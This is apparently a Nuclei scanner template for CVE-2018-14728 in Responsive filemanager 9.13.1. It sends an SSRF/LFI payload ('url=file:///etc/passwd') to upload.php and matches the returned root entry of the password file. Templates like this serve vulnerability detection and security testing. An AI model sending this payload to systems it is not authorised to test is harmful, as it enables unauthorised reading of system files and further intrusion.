id: CVE-2018-14728

info:
  name: Responsive filemanager 9.13.1 - SSRF/LFI
  author: madrobot
  severity: high 

requests:
  - method: POST
    path:
      - "{{BaseURL}}/filemanager/upload.php"
    body:
      - "fldr=&url=file:///etc/passwd"
    
    matchers:
      - type: regex
        regex:
            - "root:[x*]:0:0:"
        part: body